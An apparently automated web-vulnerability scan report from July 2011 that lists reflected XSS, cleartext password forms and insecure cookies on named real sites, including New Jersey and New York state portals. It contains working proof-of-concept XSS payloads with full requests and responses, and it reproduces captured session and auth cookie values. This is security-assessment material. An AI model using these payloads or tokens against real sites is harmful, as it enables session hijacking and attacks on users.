XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07132011-01

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. https://hi.state.nj.us/DOBI_RELOLTRF/* [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Firm
Host:	https://hi.state.nj.us
Path:	/DOBI_RELOLTRF/*

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript inline comment. The payload aa1d6*/2a7a5043949 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /DOBI_RELOLTRF/*aa1d6*/2a7a5043949 HTTP/1.1
Host: hi.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: IBM_HTTP_Server
$WSEP:
Content-Length: 59
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 404: SRVE0190E: File not found: /*aa1d6*/2a7a5043949

1.2. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/js/auth.js [psScriptReferrer parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/amserver/js/auth.js

Issue detail

The value of the psScriptReferrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ded1\'%3bde885b10c60 was submitted in the psScriptReferrer parameter. This input was echoed as 2ded1\\';de885b10c60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /http://portal20.sa.state.nj.us:8080/amserver/js/auth.js?psScriptReferrer=2ded1\'%3bde885b10c60 HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Referer: https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login?gw=portal01.state.nj.us&org=snj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8KCHkif57us6GAU2YZ9vUrrHig0JMuag%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:41 GMT
Content-type: application/x-javascript
Last-modified: Sun, 20 Feb 2011 11:58:34 GMT
Accept-ranges: bytes
Content-Length: 17856
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9

/**
* $Id: auth.js,v 1.10.10.1 2007/09/19 02:14:14 la204265 Exp $
* Copyright ? 2005 Sun Microsystems, Inc. All rights reserved.
*
* Sun Microsystems, Inc. has intellectual property rights relati
...[SNIP]...
search(re) != -1) { match = true; }
}
}
return !match;
}//shouldIRewrite

function psSRAPRewriter_convert_expression( aURI )
{
var requestNetworkURI = '';
var requestBaseURI = '2ded1\\';de885b10c60';
var gatewayURI = 'https://portal01.state.nj.us';

if( aURI == null ||
'string' != ( typeof aURI ) )
{
return aURI;
}

var splitArray = psSplit( aURI );
if( splitArray[1].le
...[SNIP]...

1.3. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/js/auth.js [psScriptReferrer parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/amserver/js/auth.js

Issue detail

The value of the psScriptReferrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e636\'%3b44af179b2e6 was submitted in the psScriptReferrer parameter. This input was echoed as 5e636\\';44af179b2e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/js/auth.js?psScriptReferrer=5e636\'%3b44af179b2e6 HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:33 GMT
Content-type: application/x-javascript
Last-modified: Sun, 20 Feb 2011 11:58:34 GMT
Accept-ranges: bytes
Content-Length: 17856
Connection: close

/**
* $Id: auth.js,v 1.10.10.1 2007/09/19 02:14:14 la204265 Exp $
* Copyright ? 2005 Sun Microsystems, Inc. All rights reserved.
*
* Sun Microsystems, Inc. has intellectual property rights relati
...[SNIP]...
search(re) != -1) { match = true; }
}
}
return !match;
}//shouldIRewrite

function psSRAPRewriter_convert_expression( aURI )
{
var requestNetworkURI = '';
var requestBaseURI = '5e636\\';44af179b2e6';
var gatewayURI = 'https://portal01.state.nj.us';

if( aURI == null ||
'string' != ( typeof aURI ) )
{
return aURI;
}

var splitArray = psSplit( aURI );
if( splitArray[1].le
...[SNIP]...

1.4. http://www.nysegov.com/citGuide.cfm [content parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nysegov.com
Path:	/citGuide.cfm

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408f3"><script>alert(1)</script>940c2cc7b95 was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /citGuide.cfm?superCat=64&content=main408f3"><script>alert(1)</script>940c2cc7b95 HTTP/1.1
Host: www.nysegov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>

                   <link rel="STYLESHEET" type
...[SNIP]...
<a href="/citGuide.cfm?superCat=64&content=main408f3"><script>alert(1)</script>940c2cc7b95"
                title="Education"
                style="font-weight:bold">
...[SNIP]...

1.5. http://www.nysegov.com/citGuide.cfm [superCat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nysegov.com
Path:	/citGuide.cfm

Issue detail

The value of the superCat request parameter is copied into an HTML comment. The payload cd85c--><img%20src%3da%20onerror%3dalert(1)>05e117d96e0 was submitted in the superCat parameter. This input was echoed as cd85c--><img src=a onerror=alert(1)>05e117d96e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /citGuide.cfm?superCat=64cd85c--><img%20src%3da%20onerror%3dalert(1)>05e117d96e0 HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Banner Error Handler Page</title>
</head>

<body>
<table background="http://www.nysegov.com/images/pi
...[SNIP]...
<img src=a onerror=alert(1)>05e117d96e0 is undefined in a CFML structure referenced as part of an expression. <br>
...[SNIP]...

1.6. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://medienfreunde.com
Path:	/lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 365d9"><script>alert(1)</script>ec55b53cb71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 365d9"><script>alert(1)</script>ec55b53cb71

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">

<hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Flyer&blogurl=365d9"><script>alert(1)</script>ec55b53cb71&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

2. Cleartext submission of password previous next
There are 3 instances of this issue:

http://visitnj.org/
http://www.visitnj.org/events
http://www.visitnj.org/new-jerseys-wineries

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

2.1. http://visitnj.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://visitnj.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://visitnj.org/

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS5d506fc80e0e90dcab3fa28ac30949e1=s7maojbbsjalvugal99t5oad66; expires=Fri, 05-Aug-2011 05:24:35 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:03 GMT
ETag: "b64f70a6778aaba742ca2cb12822f6ab"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

2.2. http://www.visitnj.org/events previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.visitnj.org
Path:	/events

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.visitnj.org/events

The form contains the following password field:

pass

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:26 GMT
ETag: "1c02c8d04dbc4f40ed09302c3263264b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/events" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

2.3. http://www.visitnj.org/new-jerseys-wineries previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.visitnj.org
Path:	/new-jerseys-wineries

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.visitnj.org/new-jerseys-wineries

The form contains the following password field:

pass

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 22:00:07 GMT
ETag: "fcfdc2bb205847c6a67cce0b8add1bc2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42712

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;"><tr><th colspan="2"> Database Error</th></tr>
<tr><td align="right" valign="top">Message:</td><td>[<b>M
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/new-jerseys-wineries" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

3. SSL cookie without secure flag set previous next
There are 13 instances of this issue:

https://www.mybenefits.ny.gov/
https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp
https://maps-api-ssl.google.com/maps
https://market.android.com/reviews/components
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

3.1. https://www.mybenefits.ny.gov/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.mybenefits.ny.gov
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=5E672420895F3B98A26F8AFC3DE47B0C; Path=/
GUEST_LANGUAGE_ID=en_US; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mybenefits.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 13 Jul 2011 01:50:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Liferay-Portal: Liferay Portal Enterprise Edition 6.0 EE SP1 (Bunyan / Build 6011 / January 13, 2011)
ETag: "3bf491b4"
Content-Type: text/html;charset=UTF-8
Content-Length: 33290
Set-Cookie: JSESSIONID=5E672420895F3B98A26F8AFC3DE47B0C; Path=/
Set-Cookie: GUEST_LANGUAGE_ID=en_US; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/
Set-Cookie: COOKIE_SUPPORT=true; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/
Set-Cookie: I4WEB_IID=1677;path=/;
Set-Cookie: PPortalROUTEID=.3; path=/
Connection: close

<!DOCTYPE html> <html class="ltr" dir="ltr" lang="en-US"><script LANGUAGE="JavaScript1.2">
<!--
// Precise/Indepth For Web code v9.0
if (typeof(TextDate) == 'undefined' && location.host != "") {va
...[SNIP]...

3.2. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www1.state.nj.us
Path:	/TYTR_Saver/jsp/common/Login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=212f7dfab86ed2f492b92e02d519;Path=/TYTR_Saver

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.3. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.4. https://market.android.com/reviews/components previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/reviews/components

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

PREF=ID=9cae866da36d6f34:U=c20011dc93789892:TM=1310522402:LM=1310522420:S=mLzmlvNZoj-H6Lpz; expires=Fri, 12-Jul-2013 02:00:20 GMT; path=/; domain=market.android.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /reviews/components HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.avai.amp.pbn_delaware
Content-Length: 339
Origin: https://market.android.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

req={"appId":54,"reqId":"1310522401955-0.8032410256564617","hl":"en_US","js":true,"specs":[{"type":"0","url":"3","groups":"4","id":"1"},{"type":"0","url":"3","groups":"4","id":"2"}],"internedKeys":["0
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: PREF=ID=9cae866da36d6f34:U=c20011dc93789892:TM=1310522402:LM=1310522420:S=mLzmlvNZoj-H6Lpz; expires=Fri, 12-Jul-2013 02:00:20 GMT; path=/; domain=market.android.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: zfe
Content-Length: 1308
X-XSS-Protection: 1; mode=block

window.google.annotations2.component.load({'1':{'augmentor':function(){var h=window.google.annotations2.component;var k=function(e,b,d,c){for(var g=0,a;a=e.childNodes[g];++g)if(a.nodeType==1){var f=a.
...[SNIP]...

3.5. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

%2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
%2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http://portal20.sa.state.nj.us:8080/amserver/UI/Login?gw=portal01.state.nj.us&org=snj HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.6. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

%2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
%2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.7. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main.css HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
